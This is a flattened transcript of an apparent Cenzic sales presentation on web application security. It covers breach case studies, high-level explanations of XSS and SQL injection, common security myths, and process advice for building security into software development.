  • 16. No One Wants To Be in the Press “Who is responsible when a hack occurs?” “False sense of Security” “Concerns with finding all vulnerabilities” “Worried” Cenzic Confidential 16
  • 17. Why worry? Source: People's Daily Online 5-19-10 A total of 81 government Web sites in China were  81 govt sites tampered from May 10 to May 16, down 35 percent compared to the previous week, according  May 10th-16th to a report released by National Computer Network Emergency Response Technical Team.  down 35% As of 12 p.m. on Monday, 29 hacked government  29 hacked sites…still not been Web sites had still not been restored, including restored four provincial Web sites. Monitoring shows major threats are from software risk loopholes, spread of  150 .CN malicious domain names malicious codes and page revisions. The report revealed 150 .CN malicious domain  5 malicious codes names, five malicious codes and five software loopholes. And .xorg.pl, a malicious domain group  5 software loopholes registered in Poland, has more than 100 malicious domain names and has been used to tamper with  Malicious domain group registered many Chinese Web sites and users. in Poland Data shows security awareness and security  100 malicious domain names measures should be strengthened. And 124 government Web sites were hacked from May 2 to  Security awareness and security May 9. measure should be strengthened  124 Web sites were hacked form May 2-9 Cenzic Confidential 17
  • 19. Specific Hacking Case Studies: Heartland  Disclosed in January, 2009  Up to 130M cards exposed – largest attack (more than TJX) • Not discovered until late 2008 • Impact: • Stock price went down 78% • Breach related expenses of $140 million • Millions of dollars in damages and recovery • Embarrassment for the company • Revenue loss • Learning: • PCI compliance ≠ App security Cenzic Confidential 19
  • 20. Specific Hacking Case Studies: RBS World Pay  Disclosed in December, 2008  Up to 1.5M cards stolen • Installed Malware • Cloned cards were given to an army of “cashers” across 49 cities around the world • Visited 2,100 ATM machines in 280 cities • Impact: • $9M stolen in less than 12 hours • Embarrassment for the company • Reputation damage • Learning: • Hackers are getting very sophisticated and organized Cenzic Confidential 20
  • 21. Vulnerability Examples Cenzic Confidential 21
  • 22. Cross-Site Scripting (XSS)  What is it?: Found in web applications which allow code injection by malicious web users into the web pages viewed by other users. The Web Application is used to store, transport, and deliver malicious active content to an unsuspecting user. Used by attackers to bypass access controls such as the same origin policy. Recently, used to craft powerful phishing attacks and browser exploits.  Root Cause: Failure to proactively reject or scrub malicious characters from input vectors. Cenzic Confidential 22
  • 23. Impacts of XSS  Session Hijacking: Hacker can steal the session id of the user and use it conduct transactions  Record Key Strokes: Hacker can record all the keystrokes of the victim  Entry point: Hacker can use XSS to hack into the network and go deeper into other servers  Steal information: A victim’s files and PII can be accessed and exploited by the hacker Cenzic Confidential 23
  • 24. SQL Injection  What is it?: Database contents are compromised or disclosed by the use of specially crafted form input that manipulates SQL Query Logic.  Root Cause: Failure to properly sanitize, reject, or escape domain-specific SQL characters from an input vector. Cenzic Confidential 24
  • 25. Impacts of SQL Injection  Customer information: Hacker can get access to all your customer records  Public Defacement: Hackers can easily deface thousands of sites with one attack  Database Server: Hacker can compromise a database server with SQL attacks  Bypass Log-in: By using simple SQL commands, a hacker can bypass the log-in credentials Cenzic Confidential 25
  • 28. Top 5 Web Security Myths  I have SSL so that’ll protect my Web site • SSL ≠ App Security  Have never been hacked • How do you know?  PCI compliant • Heartland, Hannaford…  I can test few of my Web applications once a year • Any vulnerable site is your weakest link  Expensive • Many flexible options to get you jump started Cenzic Confidential 28
  • 29. Top Reason #1 Web Applications Are Getting More Complex  Web 2.0 technologies exacerbate the problem • Think you are not using Web 2.0? Think again!  e.g. Software mashups • How do you know any of the original app is secure? • How do you know the resulting app does not include new vulns? Cenzic Confidential 29
  • 30. Top Reason #2 Compliance Pressure Isn’t Letting Up (PCI, SOX, GLBA, HIPAA, FIECC, …)  Each regulation may have some level of implication on application security  PCI section 6 has specific provision requirements for Web security  We expect more regulations to follow suite • California AB 211, section 1, 56.36 (b) Cenzic Confidential 30
  • 31. Top Reason #3 Third Party Code is Prevalent • Outsourced, open source, and packaged applications  Enterprises use more open source code than they know • Apache, Net SNMP, Zlib, JBoss  Few software outsourcing providers have secure coding provisions or service level guarantees  Do you know the security quality of third-party code and apps? Cenzic Confidential 31
  • 33. Application Security Maturity Model High Tools & Technology Low Panic Scramble Pit of Despair Security as Core Business Process Low High People & Process 33
  • 34. Enterprise Security Challenge C-Level Will I get Hacked? Information Security Dev Dev Dev Business Unit Business Unit Business Unit QA QA QA App 1 App 1 App 1 App 2 App 2 App 2 App 3 App 3 App 3 Pre-Production Dev, QA, Staging Production Cenzic Confidential 34
  • 35. Web & Software Security Lifecycle Production/ Launch update1 update2 Training Dev Begins Alpha/Beta ... Planning Scanning/Testing Application Security is NOT a One Time Event but a Discipline Over Time! Cenzic Confidential 35
  • 36. SDLC & Black Box Testing Software Development Life Cycle Design Build Deploy Operate Code Review Build & Test Automation White Box Testing Black Box Testing Pen Test Decision Support & Process Optimization Cenzic Confidential 36
  • 37. You May Have To Change Internal Procedures & Processes  Buy in • Management • Grass roots  Create a dedicated application security role • Align this role with business, operations, and development and QA • Define responsibility and accountability structure  Engage business to define priorities, standards, and Seat at the table… policies Cenzic Confidential 37
  • 38. You May Have To Change Internal Procedures & Processes  Move certain security functions into operations • Security measures must be simple enough for non-experts • Must integrate with existing operational procedures and tools  Metrics • Implement reporting and metrics to measure risk • Identify technology solutions/services that will provide meaningful metrics • Review, rinse, repeat START! Cenzic Confidential 38
  • 39. Final Thoughts  This is real  Bad guys are getting smarter  Think about process/strategy  Test frequently  Starting Early = less $$ Cenzic Confidential 39
  • 40. Jon Zucker jon@cenzic.com www.Cenzic.com | 1-866-4-CENZIC (1-866-423-6942) Cenzic Confidential 40